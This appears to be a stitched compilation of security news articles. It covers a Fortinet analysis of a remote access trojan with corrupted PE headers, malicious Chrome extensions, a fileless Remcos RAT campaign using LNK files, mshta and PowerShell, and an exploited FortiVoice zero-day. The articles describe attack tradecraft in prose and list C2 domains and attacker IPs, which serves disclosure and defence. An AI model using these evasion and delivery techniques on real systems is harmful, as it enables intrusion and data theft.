New research from Fortinet reveals a worrying rise in cyberattacks powered by AI.

May 29, 2025Ravie LakshmananMalware / Windows Security Cybersecurity researchers have taken the wraps off an unusual cyber attack that leveraged malware with corrupted DOS and PE headers, according to new findings from Fortinet. The DOS (Disk Operating System) and PE (Portable Executable) headers are essential parts of a Windows PE file, providing information about the executable. While the DOS header makes the executable file backward compatible with MS-DOS and allows it to be recognized as a valid executable by the operating system, the PE header contains the metadata and information necessary for Windows to load and execute the program. "We discovered malware that had been running on a compromised machine for several weeks," researchers Xiaopeng Zhang and John Simmons from the FortiGuard Incident Response Team said in a report shared with The Hacker News. "The threat actor had executed a batch of scripts and PowerShell to run the malware in a Windows process." Fortinet said while it was unable to extract the malware itself, it acquired a memory dump of the running malware process and a full memory dump of the compromised machine. It's currently not known how the malware is distributed or how widespread the attacks distributing it are. The malware, running within a dllhost.exe process, is a 64-bit PE file with corrupted DOS and PE headers in a bid to challenge analysis efforts and reconstruct the payload from memory. Despite these roadblocks, the cybersecurity company further noted that it was able to take apart the dumped malware within a controlled local setting by replicating the compromised system's environment after "multiple trials, errors, and repeated fixes." The malware, once executed, decrypts command-and-control (C2) domain information stored in memory and then establishes contact with the server ("rushpapers[.]com") in a newly created threat. "After launching the thread, the main thread enters a sleep state until the communication thread completes its execution," the researchers said. "The malware communicates with the C2 server over the TLS protocol." Further analysis has determined the malware to be a remote access trojan (RAT) with capabilities to capture screenshots; enumerate and manipulate the system services on the compromised host; and even act as a server to await incoming "client" connections. "It implements a multi-threaded socket architecture: each time a new client (attacker) connects, the malware spawns a new thread to handle the communication," Fortinet said. "This design enables concurrent sessions and supports more complex interactions." "By operating in this mode, the malware effectively turns the compromised system into a remote-access platform, allowing the attacker to launch further attacks or perform various actions on behalf of the victim." Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE    

Security researchers from Domain Tools warn that there are hundreds of Chrome extensions stealing data and running malware on the sly, reports BleepingComputer. Many of the malicious extensions are riding the coattails of well-known brands such as Fortinet, YouTube, Deepseek AI, and Calendly, increasing the risk of users installing them and getting into trouble. Google has reportedly removed most of the targeted extensions from the Chrome Web Store, but some still remain at the time of writing. We saw something similar happen last month when a cybersecurity researcher at Secure Annex found numerous malicious Chrome extensions being spread via ads and scam sites. It’s yet another example of why you need to vet your browser extensions carefully. To be on the safe side, you should always check out all available reviews before downloading any extensions to your browser, and always double-check that you’re downloading the official one. If you think you’ve been hit, see our article on how to remove malicious Chrome extensions.

May 16, 2025Ravie LakshmananMalware / Cyber Attack Cybersecurity researchers have shed light on a new malware campaign that makes use of a PowerShell-based shellcode loader to deploy a remote access trojan called Remcos RAT. "Threat actors delivered malicious LNK files embedded within ZIP archives, often disguised as Office documents," Qualys security researcher Akshay Thorve said in a technical report. "The attack chain leverages mshta.exe for proxy execution during the initial stage." The latest wave of attacks, as detailed by Qualys, employs tax-related lures to entice users into opening a malicious ZIP archive containing a Windows shortcut (LNK) file, which, in turn, makes use of mshta.exe, a legitimate Microsoft tool used to run HTML Applications (HTA). The binary is used to execute an obfuscated HTA file named "xlab22.hta" hosted on a remote server, which incorporates Visual Basic Script code to download a PowerShell script, a decoy PDF, and another HTA file similar to xlab22.hta called "311.hta." The HTA file is also configured to make Windows Registry modifications to ensure that "311.hta" is automatically launched upon system startup. Once the PowerShell script is executed, it decodes and reconstructs a shellcode loader that ultimately proceeds to launch the Remcos RAT payload entirely in memory. Remcos RAT is a well-known malware that offers threat actors full control over compromised systems, making it an ideal tool for cyber espionage and data theft. A 32-bit binary compiled using Visual Studio C++ 8, it features a modular structure and can gather system metadata, log keystrokes, capture screenshots, monitor clipboard data, and retrieve a list of all installed programs and running processes. In addition, it establishes a TLS connection to a command-and-control (C2) server at "readysteaurants[.]com," maintaining a persistent channel for data exfiltration and control. This is not the first time fileless versions of Remcos RAT have been spotted in the wild. In November 2024, Fortinet FortiGuard Labs detailed a phishing campaign that filelessly deployed the malware by making use of order-themed lures. What makes the attack method attractive to threat actors is that it allows them to operate undetected by many traditional security solutions as the malicious code runs directly in the computer's memory, leaving very few traces on the disk. "The rise of PowerShell-based attacks like the new Remcos RAT variant demonstrates how threat actors are evolving to evade traditional security measures," J Stephen Kowski, Field CTO at SlashNext, said. "This fileless malware operates directly in memory, using LNK files and MSHTA.exe to execute obfuscated PowerShell scripts that can bypass conventional defenses. Advanced email security that can detect and block malicious LNK attachments before they reach users is crucial, as is real-time scanning of PowerShell commands for suspicious behaviors." The disclosure comes as Palo Alto Networks Unit 42 and Threatray detailed a new .NET loader that's used to detonate a wide range of commodity information stealers and RATS like Agent Tesla, NovaStealer, Remcos RAT, VIPKeylogger, XLoader, and XWorm. The loader features three stages that work in tandem to deploy the final-stage payload: A .NET executable that embeds the second and third stages in encrypted form, a .NET DLL that decrypts and loads the next stage, and a .NET DLL that manages the deployment of the main malware. "While earlier versions embedded the second stage as a hardcoded string, more recent versions use a bitmap resource," Threatray said. "The first stage extracts and decrypts this data, then executes it in memory to launch the second stage." Unit 42 described the use of bitmap resources to conceal malicious payloads a a steganography technique that can bypass traditional security mechanisms and evade detection. The findings also coincide with the emergence of several phishing and social engineering campaigns that are engineered for credential theft and malware delivery - Use of trojanized versions of the KeePass password management software – codenamed KeeLoader – to drop a Cobalt Strike beacon and steal sensitive KeePass database data, including administrative credentials. The malicious installers are hosted on KeePass typosquat domains that are served via Bing ads. Use of ClickFix lures and URLs embedded within PDF documents and a series of intermediary dropper URLs to deploy Lumma Stealer. Use of booby-trapped Microsoft Office documents that are used to deploy the Formbook information stealer protected using a malware distribution service referred to as Horus Protector. Use of blob URIs to locally loads a credential phishing page via phishing emails, with the blob URIs served using allow-listed pages (e.g., onedrive.live[.]com) that are abused to redirect victims to a malicious site that contains a link to a threat actor-controlled HTML page. Use of RAR archives masquerading as setup files to distribute NetSupport RAT in attacks targeting Ukraine and Poland. Use of phishing emails to distribute HTML attachments that contain malicious code to capture victims' Outlook, Hotmail, and Gmail credentials and exfiltrate them to a Telegram bot named "Blessed logs" that has been active since February 2025 The developments have also been complemented by the rise in artificial intelligence (AI)-powered campaigns that leverage polymorphic tricks that mutate in real-time to sidestep detection efforts. These include modifying email subject lines, sender names, and body content to slip past signature-based detection. "AI gave threat actors the power to automate malware development, scale attacks across industries, and personalize phishing messages with surgical precision," Cofense said. "These evolving threats are increasingly able to bypass traditional email filters, highlighting the failure of perimeter-only defenses and the need for post-delivery detection. It also enabled them to outmaneuver traditional defenses through polymorphic phishing campaigns that shift content on the fly. The result: deceptive messages that are increasingly difficult to detect and even harder to stop." Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE    

May 14, 2025Ravie LakshmananVulnerability / Network Security Fortinet has patched a critical security flaw that it said has been exploited as a zero-day in attacks targeting FortiVoice enterprise phone systems. The vulnerability, tracked as CVE-2025-32756, carries a CVSS score of 9.6 out of 10.0. "A stack-based overflow vulnerability [CWE-121] in FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera may allow a remote unauthenticated attacker to execute arbitrary code or commands via crafted HTTP requests," the company said in an advisory. The company said it observed the flaw being exploited in the wild on FortiVoice systems, but did not disclose the scale of the attacks and the identity of the threat actors behind them. It further noted that the threat actor performed device network scans, erased system crash logs, and enabled fcgi debugging to log credentials from the system or SSH login attempts. The issue affects the following products and versions - FortiCamera 1.1, 2.0 (Migrate to a fixed release) FortiCamera 2.1.x (Upgrade to 2.1.4 or above) FortiMail 7.0.x (Upgrade to 7.0.9 or above) FortiMail 7.2.x (Upgrade to 7.2.8 or above) FortiMail 7.4.x (Upgrade to 7.4.5 or above) FortiMail 7.6.x (Upgrade to 7.6.3 or above) FortiNDR 1.1, 1.2, 1.3, 1.4, 1.5, 7.1 (Migrate to a fixed release) FortiNDR 7.0.x (Upgrade to 7.0.7 or above) FortiNDR 7.2.x (Upgrade to 7.2.5 or above) FortiNDR 7.4.x (Upgrade to 7.4.8 or above) FortiNDR 7.6.x (Upgrade to 7.6.1 or above) FortiRecorder 6.4.x (Upgrade to 6.4.6 or above) FortiRecorder 7.0.x (Upgrade to 7.0.6 or above) FortiRecorder 7.2.x (Upgrade to 7.2.4 or above) FortiVoice 6.4.x (Upgrade to 6.4.11 or above) FortiVoice 7.0.x (Upgrade to 7.0.7 or above) FortiVoice 7.2.x (Upgrade to 7.2.1 or above) Fortinet said the vulnerability was discovered by its product security team based on the threat actor activity that originated from the below IP addresses - 198.105.127.124 43.228.217.173 43.228.217.82 156.236.76.90 218.187.69.244 218.187.69.59 Users of FortiVoice, FortiMail, FortiNDR, FortiRecorder and FortiCamera are recommended to apply the necessary fixes to secure their devices from active exploitation attempts. If immediate patching is not an option, it's advised to disable the HTTP/HTTPS administrative interface as a temporary workaround. Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE    